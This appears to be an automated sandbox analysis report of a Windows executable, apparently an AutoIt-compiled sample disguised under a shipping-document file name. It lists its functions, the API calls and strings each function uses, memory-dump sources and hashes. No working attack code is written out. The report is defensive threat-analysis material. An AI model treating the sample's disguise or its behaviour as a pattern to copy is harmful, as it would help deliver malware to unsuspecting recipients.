__wcsnicmp.LIBCMT ref: 0068CCE0
__wcsnicmp.LIBCMT ref: 0068CCF8
__wcsnicmp.LIBCMT ref: 0068CD0C
__wcsnicmp.LIBCMT ref: 0068CD4D
__wcsnicmp.LIBCMT ref: 0068CD61
__wcsnicmp.LIBCMT ref: 0068CD75
__wcsnicmp.LIBCMT ref: 0068CD89

Strings

#notrayicon, xrefs: 0068CC7A
#requireadmin, xrefs: 0068CC92
Cannot parse #include, xrefs: 006F2FA1
#include-once, xrefs: 0068CCC2
#include, xrefs: 0068CCDA
#comments-start, xrefs: 0068CCF2, 0068CD47
#OnAutoItStartRegister, xrefs: 0068CCAA
Bad directive syntax error, xrefs: 006F2ECB
Unterminated group of comments, xrefs: 006F2FB4
#comments-end, xrefs: 0068CD6F
#ce, xrefs: 0068CD83
#cs, xrefs: 0068CD06, 0068CD5B
#pragma compile, xrefs: 0068CC62

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 2c354fe5a5c8acf4889c2ceb0a488d3a5733066520377cce1cdfe04740bdffd1
Instruction ID: d24a956c92f68e378a543dcbf9ddce0cc1feeed41f39a42c1855fb8d0082e75c
Opcode Fuzzy Hash: 2c354fe5a5c8acf4889c2ceb0a488d3a5733066520377cce1cdfe04740bdffd1
Instruction Fuzzy Hash: FC81087064020AABCB60BB64DD53FFB776BAF15720F04412DF905AA1C2EB74D941CBA5

Function 006EC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 006EC788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006EC83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 006EC859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 006ECB15

Strings

0, xrefs: 006EC89C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 42c9d6e3950583e62a2662919f1ed0807c9e02bb25241f394cfac53bf1e9e4a7
Instruction ID: 9325618b23c3c4dd52090f48b203b06dc4d0f875307165ca39bfaf77fdbe11c9
Opcode Fuzzy Hash: 42c9d6e3950583e62a2662919f1ed0807c9e02bb25241f394cfac53bf1e9e4a7
Instruction Fuzzy Hash: D7F1F370106380AFD7218F29CC45BAABBE6FF49364F18462DF588963A1C774CC46CB92

Function 006E638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0071DC00), ref: 006E6449

Strings

GETLINE, xrefs: 006E678B
UNCHECK, xrefs: 006E66A1
EDITPASTE, xrefs: 006E675B
TABRIGHT, xrefs: 006E64BD
TABLEFT, xrefs: 006E64A7
DELSTRING, xrefs: 006E6569
SELECTSTRING, xrefs: 006E6626
ISCHECKED, xrefs: 006E6659
SETCURRENTSELECTION, xrefs: 006E65D6
GETCURRENTLINE, xrefs: 006E6704
CURRENTTAB, xrefs: 006E64DD
ADDSTRING, xrefs: 006E6536
GETLINECOUNT, xrefs: 006E66E4
SENDCOMMANDID, xrefs: 006E67CA
FINDSTRING, xrefs: 006E6596
HIDEDROPDOWN, xrefs: 006E6520
GETSELECTED, xrefs: 006E66C1
GETCURRENTSELECTION, xrefs: 006E6603
CHECK, xrefs: 006E668B
ISENABLED, xrefs: 006E648C
GETCURRENTCOL, xrefs: 006E6724
ISVISIBLE, xrefs: 006E6455
SHOWDROPDOWN, xrefs: 006E6500

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 1bf6c53aad5700312c85e7187f4cf512a3740207b305fcb22c620c8782d3bf76
Instruction ID: e79a81a9ebd136834d6b15d7e3721b4c3dc422a4f297e113d958d34a01e93614
Opcode Fuzzy Hash: 1bf6c53aad5700312c85e7187f4cf512a3740207b305fcb22c620c8782d3bf76
Instruction Fuzzy Hash: C5C18F702053858BCB44EF11C551AAE77A7AFA4384F04486CF8965B3E3DB21ED4BCB96

Function 006ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 006ED5AE
SetTextColor.GDI32(?,?), ref: 006ED5B2
GetSysColorBrush.USER32(0000000F), ref: 006ED5C8
GetSysColor.USER32(0000000F), ref: 006ED5D3
CreateSolidBrush.GDI32(?), ref: 006ED5D8
GetSysColor.USER32(00000011), ref: 006ED5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 006ED5FE
SelectObject.GDI32(?,00000000), ref: 006ED60F
SetBkColor.GDI32(?,00000000), ref: 006ED618
SelectObject.GDI32(?,?), ref: 006ED625
InflateRect.USER32(?,000000FF,000000FF), ref: 006ED644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006ED65B
GetWindowLongW.USER32(00000000,000000F0), ref: 006ED670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006ED698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006ED6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 006ED6DD
DrawFocusRect.USER32(?,?), ref: 006ED6E8
GetSysColor.USER32(00000011), ref: 006ED6F6
SetTextColor.GDI32(?,00000000), ref: 006ED6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006ED712
SelectObject.GDI32(?,006ED2A5), ref: 006ED729
DeleteObject.GDI32(?), ref: 006ED734
SelectObject.GDI32(?,?), ref: 006ED73A
DeleteObject.GDI32(?), ref: 006ED73F
SetTextColor.GDI32(?,?), ref: 006ED745
SetBkColor.GDI32(?,?), ref: 006ED74F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 5e85ba46e28bd8efc87f4e82bb2efa8490eb11c7931d98c27a24259470d01888
Instruction ID: 4c29f3115c113c77cf1eb6cb9ed6d261c430c410b5226be620dd2382a88d35c9
Opcode Fuzzy Hash: 5e85ba46e28bd8efc87f4e82bb2efa8490eb11c7931d98c27a24259470d01888
Instruction Fuzzy Hash: EC513F71901208EFDF209FA5DC48EEE7B7AEB08320F118615F915AB2A1DB759E40CF54

Function 006EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006EB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006EB7C1
CharNextW.USER32(0000014E), ref: 006EB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006EB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006EB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006EB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006EB875
SetWindowTextW.USER32(?,0000014E), ref: 006EB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006EB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 006EB90E
_memset.LIBCMT ref: 006EB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006EB97C
_memset.LIBCMT ref: 006EB9DB
SendMessageW.USER32 ref: 006EBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 006EBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 006EBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 006EBB2C
GetMenuItemInfoW.USER32(?), ref: 006EBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006EBBA3
DrawMenuBar.USER32(?), ref: 006EBBB2
SetWindowTextW.USER32(?,0000014E), ref: 006EBBDA

Strings

0, xrefs: 006EBB4F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: c97e48bb3eb8b53db5b4cca9b20213334a128918e592a23cbe8783fbf1260b1a
Instruction ID: 60fcccf192e157003d14f017bd0fc05dd38a083cce943936e368f2e931fa7c84
Opcode Fuzzy Hash: c97e48bb3eb8b53db5b4cca9b20213334a128918e592a23cbe8783fbf1260b1a
Instruction Fuzzy Hash: C4E19D75901358ABDF20DFA6CC84AEF7B7AEF05750F10815AF919AA290DB748A41CF60

Function 00682EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00682F7A
IsWindow.USER32(?), ref: 006F22FD

Strings

HANDLE, xrefs: 006F20E2
REGEXPCLASS, xrefs: 006F2149
REGEXPTITLE, xrefs: 006F20F8
P+s, xrefs: 006F21E0
T+s, xrefs: 006F220E
CLASS, xrefs: 006F2128
INSTANCE, xrefs: 006F223C
ACTIVE, xrefs: 006F20CC
TITLE, xrefs: 006F2292
ALL, xrefs: 006F2264
L+s, xrefs: 006F21B2
H+s, xrefs: 006F2184
LAST, xrefs: 006F20B6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+s$HANDLE$INSTANCE$L+s$LAST$P+s$REGEXPCLASS$REGEXPTITLE$T+s$TITLE
API String ID: 62970417-1666195614
Opcode ID: 13afc11bfa7cdb61dd231a71b6551e0607378d8e765bc7f1ea9f4b71d9b40953
Instruction ID: 6e727ca137e1dff19dcc0ec797dfe26fe32f6be999f732a06192e273e2b55fff
Opcode Fuzzy Hash: 13afc11bfa7cdb61dd231a71b6551e0607378d8e765bc7f1ea9f4b71d9b40953
Instruction Fuzzy Hash: A5D1F470108647DBCB04EF20C8919EABBA7BF54304F004A2DF596576A2DB31E99BCF95

Function 006E764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006E778A
GetDesktopWindow.USER32 ref: 006E779F
GetWindowRect.USER32(00000000), ref: 006E77A6
GetWindowLongW.USER32(?,000000F0), ref: 006E7808
DestroyWindow.USER32(?), ref: 006E7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006E785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006E787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006E78A1
SendMessageW.USER32(?,00000421,?,?), ref: 006E78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006E78C9
IsWindowVisible.USER32(?), ref: 006E78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006E7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006E7918
GetWindowRect.USER32(?,?), ref: 006E7930
MonitorFromPoint.USER32(?,?,00000002), ref: 006E7956
GetMonitorInfoW.USER32 ref: 006E7970
CopyRect.USER32(?,?), ref: 006E7987
SendMessageW.USER32(?,00000412,00000000), ref: 006E79F2

Strings

tooltips_class32, xrefs: 006E7856
(, xrefs: 006E7965
0, xrefs: 006E7735

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a6f69ab42811a0bb78aafa8ff7d1b8cbe2fca67a0fd42f4142a48ebae8ef1f4f
Instruction ID: 683ff973c9385400bdc7d3a2352e72bbfb944d752278542dc2955df0265fccc2
Opcode Fuzzy Hash: a6f69ab42811a0bb78aafa8ff7d1b8cbe2fca67a0fd42f4142a48ebae8ef1f4f
Instruction Fuzzy Hash: 29B19D71609340AFDB54DF65C848B6ABBE6FF88310F008A1DF5999B291DB70EC05CB96

Function 006C6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006C6CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006C6D21
_wcscpy.LIBCMT ref: 006C6D4F
_wcscmp.LIBCMT ref: 006C6D5A
_wcscat.LIBCMT ref: 006C6D70
_wcsstr.LIBCMT ref: 006C6D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006C6D97
_wcscat.LIBCMT ref: 006C6DE0
_wcscat.LIBCMT ref: 006C6DE7
_wcsncpy.LIBCMT ref: 006C6E12

Strings

%u.%u.%u.%u, xrefs: 006C6E75
StringFileInfo\, xrefs: 006C6D6A
04090000, xrefs: 006C6DCD
DefaultLangCodepage, xrefs: 006C6DFA
\VarFileInfo\Translation, xrefs: 006C6D8F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f610b91adf20e65575dd21e992c8a393e5ff295feed65d7b5c5e8f5eb7d301c1
Instruction ID: 2c27d016a0d16fe9f2671dbb54429f582663b99c9884c88c60b445281f0012e5
Opcode Fuzzy Hash: f610b91adf20e65575dd21e992c8a393e5ff295feed65d7b5c5e8f5eb7d301c1
Instruction Fuzzy Hash: B941D771600205BBEB50BB64CC47EBF77BDDF46720F04406DF901E6182EA75AE019AA9

Function 0069A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0069A939
GetSystemMetrics.USER32(00000007), ref: 0069A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0069A96C
GetSystemMetrics.USER32(00000008), ref: 0069A974
GetSystemMetrics.USER32(00000004), ref: 0069A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0069A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0069A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0069AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0069AA2B
GetStockObject.GDI32(00000011), ref: 0069AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0069AA52

Part of subcall function 0069B63C: GetCursorPos.USER32(000000FF), ref: 0069B64F
Part of subcall function 0069B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0069B66C
Part of subcall function 0069B63C: GetAsyncKeyState.USER32(00000001), ref: 0069B691
Part of subcall function 0069B63C: GetAsyncKeyState.USER32(00000002), ref: 0069B69F

SetTimer.USER32(00000000,00000000,00000028,0069AB87), ref: 0069AA79

Strings

AutoIt v3 GUI, xrefs: 0069A9F1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 1ee0a0cdec99aafabb36e8939781b6d148741e4789f75675fcf62a7709ee3bd0
Instruction ID: 4b289350b1c316039fe9b907f1b4a10d80c8ec65b07e4a54cd54253c518d35b6
Opcode Fuzzy Hash: 1ee0a0cdec99aafabb36e8939781b6d148741e4789f75675fcf62a7709ee3bd0
Instruction Fuzzy Hash: 17B18C71A4020ADFDF14DFA8DC45BED7BBAFB08314F118229FA15A6290DB74E841CB59

Function 006E3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006E3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0071DC00,00000000,?,00000000,?,?), ref: 006E37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006E37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006E3874
RegCloseKey.ADVAPI32(?), ref: 006E3B94
RegCloseKey.ADVAPI32(00000000), ref: 006E3BA1

Strings

REG_SZ, xrefs: 006E38B2
REG_BINARY, xrefs: 006E3B2F
REG_MULTI_SZ, xrefs: 006E395C
REG_QWORD, xrefs: 006E3AE2
REG_EXPAND_SZ, xrefs: 006E3811
REG_DWORD, xrefs: 006E3A65

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: d614e370ba33cb2caf53404b07c668fa90016c39911e5eb78788b8ad302b0c42
Instruction ID: c8b7eeb1ef0b05bffe864bfeaa0f19e269721ac068db63efcbe9c6d484fa8de3
Opcode Fuzzy Hash: d614e370ba33cb2caf53404b07c668fa90016c39911e5eb78788b8ad302b0c42
Instruction Fuzzy Hash: 82027C752007119FCB55EF25C855A2AB7E6FF88720F04855CF98A9B3A2DB30ED01CB99

Function 006E6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006E6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006E6D16

Strings

GETITEMCOUNT, xrefs: 006E6C84
GETTEXT, xrefs: 006E6CBF
GETSUBITEMCOUNT, xrefs: 006E6CA1
SELECT, xrefs: 006E6DA8
SELECTALL, xrefs: 006E6D75
VIEWCHANGE, xrefs: 006E6ECD
ISSELECTED, xrefs: 006E6D21
GETSELECTED, xrefs: 006E6E3C
DESELECT, xrefs: 006E6DFC
SELECTINVERT, xrefs: 006E6DDE
GETSELECTEDCOUNT, xrefs: 006E6CF9
FINDITEM, xrefs: 006E6E81
SELECTCLEAR, xrefs: 006E6D8D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 5e252f14869b347a4dfe1a265bd0511b8bf05a84e2667f7d5471e68f3847a2b0
Instruction ID: 1f8fe0aa522bc34a2281a4fe988a7efe497f7cbb024402265c3189adaca2cd74
Opcode Fuzzy Hash: 5e252f14869b347a4dfe1a265bd0511b8bf05a84e2667f7d5471e68f3847a2b0
Instruction Fuzzy Hash: DAA190702043819FCB54EF21C851AAAB3A7FF64394F14496CB8A65B3D2DB31ED0ACB55

Function 006BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006BCF91
__swprintf.LIBCMT ref: 006BD032
_wcscmp.LIBCMT ref: 006BD045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006BD09A
_wcscmp.LIBCMT ref: 006BD0D6
GetClassNameW.USER32(?,?,00000400), ref: 006BD10D
GetDlgCtrlID.USER32(?), ref: 006BD15F
GetWindowRect.USER32(?,?), ref: 006BD195
GetParent.USER32(?), ref: 006BD1B3
ScreenToClient.USER32(00000000), ref: 006BD1BA
GetClassNameW.USER32(?,?,00000100), ref: 006BD234
_wcscmp.LIBCMT ref: 006BD248
GetWindowTextW.USER32(?,?,00000400), ref: 006BD26E
_wcscmp.LIBCMT ref: 006BD282

Strings

%s%u, xrefs: 006BD02C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 4f9c30bb21b25279a292733159887e49543657182dd35c16cf011d6fc5d50774
Instruction ID: 5d632559d466289452b46c5143d364e322ed0b69fe50498dc24a901146fdff0a
Opcode Fuzzy Hash: 4f9c30bb21b25279a292733159887e49543657182dd35c16cf011d6fc5d50774
